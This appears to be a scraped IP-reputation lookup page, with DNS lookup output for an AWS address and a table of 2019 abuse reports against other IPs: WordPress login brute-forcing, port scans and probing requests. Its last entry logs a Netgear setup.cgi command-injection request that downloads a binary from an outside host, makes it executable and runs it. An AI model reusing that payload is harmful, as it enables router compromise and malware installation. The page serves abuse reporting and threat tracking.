City: unknown
Region: unknown
Country: United States of America (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 34.213.136.98
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7565
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;34.213.136.98. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020302 1800 900 604800 86400
;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 04 09:24:39 CST 2025
;; MSG SIZE rcvd: 10698.136.213.34.in-addr.arpa domain name pointer ec2-34-213-136-98.us-west-2.compute.amazonaws.com.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
98.136.213.34.in-addr.arpa name = ec2-34-213-136-98.us-west-2.compute.amazonaws.com.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 194.61.24.227 | attack | /admin attack on Magento installation |
2019-06-03 00:54:04 |
| 46.0.118.192 | bots | 俄罗斯爬虫 |
2019-06-04 06:49:17 |
| 123.249.83.139 | attack | 事件類型:Misc Attack 特徵碼:ET DROP Spamhaus DROP Listed Traffic Inbound group 7 |
2019-06-10 01:38:52 |
| 74.82.47.43 | attack | 1561092375 - 06/21/2019 06:46:15 Host: scan-10j.shadowserver.org/74.82.47.43 Port: 10001 UDP Blocked |
2019-06-21 13:02:13 |
| 198.199.94.14 | attackbotsspam | 198.199.94.14 - - \[21/Jun/2019:06:46:39 +0200\] "GET /wp-login.php HTTP/1.1" 200 1129 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 198.199.94.14 - - \[21/Jun/2019:06:46:45 +0200\] "POST /wp-login.php HTTP/1.1" 200 1524 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 198.199.94.14 - - \[21/Jun/2019:06:46:51 +0200\] "GET /wp-login.php HTTP/1.1" 200 1129 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 198.199.94.14 - - \[21/Jun/2019:06:46:53 +0200\] "POST /wp-login.php HTTP/1.1" 200 1507 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 198.199.94.14 - - \[21/Jun/2019:06:46:56 +0200\] "GET /wp-login.php HTTP/1.1" 200 1129 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 198.199.94.14 - - \[21/Jun/2019:06:47:05 +0200\] "POST /wp-login.php HTTP/1.1" 200 1503 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) |
2019-06-21 12:51:05 |
| 201.193.165.71 | attackspambots | port scan and connect, tcp 23 (telnet) |
2019-06-21 12:55:40 |
| 103.111.86.242 | attack | Hacked my email and tried to change my netflix info |
2019-06-13 02:15:32 |
| 117.184.250.101 | botsattack | 117.184.250.101 - - [21/Jun/2019:10:49:49 +0800] "GET /wp-includes/js/comment-reply.min.js HTTP/1.1" 404 209 "https://118.25.52.138/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 117.184.250.101 - - [21/Jun/2019:10:49:49 +0800] "GET /skins/vector/csshover.htc HTTP/1.1" 404 209 "https://118.25.52.138/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 117.184.250.101 - - [21/Jun/2019:10:49:49 +0800] "GET /misc/states.js HTTP/1.1" 404 209 "https://118.25.52.138/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 117.184.250.101 - - [21/Jun/2019:10:49:49 +0800] "GET /static/js/md5.js HTTP/1.1" 404 209 "https://118.25.52.138/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 117.184.250.101 - - [21/Jun/2019:10:49:49 +0800] "GET /include/js/md5.js HTTP/1.1" 404 209 "https://118.25.52.138/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" |
2019-06-21 10:51:34 |
| 3.88.68.180 | bots | 3.88.68.180 - - [12/Jun/2019:10:42:03 +0800] "GET /check-ip/ HTTP/1.1" 200 2935 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" 3.88.68.180 - - [12/Jun/2019:10:42:06 +0800] "GET /report-ip HTTP/1.1" 200 2896 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" 3.88.68.180 - - [12/Jun/2019:10:42:08 +0800] "GET /faq HTTP/1.1" 200 3002 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" 3.88.68.180 - - [12/Jun/2019:10:42:11 +0800] "GET /aboutus HTTP/1.1" 200 3469 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" 3.88.68.180 - - [12/Jun/2019:10:42:13 +0800] "GET /report-ip HTTP/1.1" 200 2898 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" 3.88.68.180 - - [12/Jun/2019:10:42:25 +0800] "GET /check-ip/117.90.66.176 HTTP/1.1" 200 9849 "-" "Jersey/2.25.1 (Apache HttpClient 4.5)" |
2019-06-12 10:43:30 |
| 88.249.222.200 | normal | mail adresini ogreneceğim |
2019-06-01 12:13:47 |
| 131.255.82.160 | attack | 20 attempts against mh-ssh on lake.magehost.pro |
2019-06-21 12:49:52 |
| 181.177.242.227 | attackbots | Automatic report - Web App Attack |
2019-06-21 12:58:17 |
| 23.254.167.205 | attackspambots | Multiple failed RDP login attempts |
2019-06-21 13:01:13 |
| 203.34.152.133 | bots | 203.34.152.133 - - [03/Jun/2019:10:59:30 +0800] "GET /Public/home/appjs/Index.js HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)" |
2019-06-03 10:59:52 |
| 159.203.173.152 | attack | 159.203.173.152 - - [03/Jun/2019:10:41:35 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://104.168.204.214/akbins/mips.akira.ak%20-O%20/var/tmp/mips.akira.ak;%20chmod%20777%20/var/tmp/mips.akira.ak;%20/var/tmp/mips.akira.ak;%20rm%20-rf%20/var/tmp/mips.akira.ak&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-06-03 10:42:31 |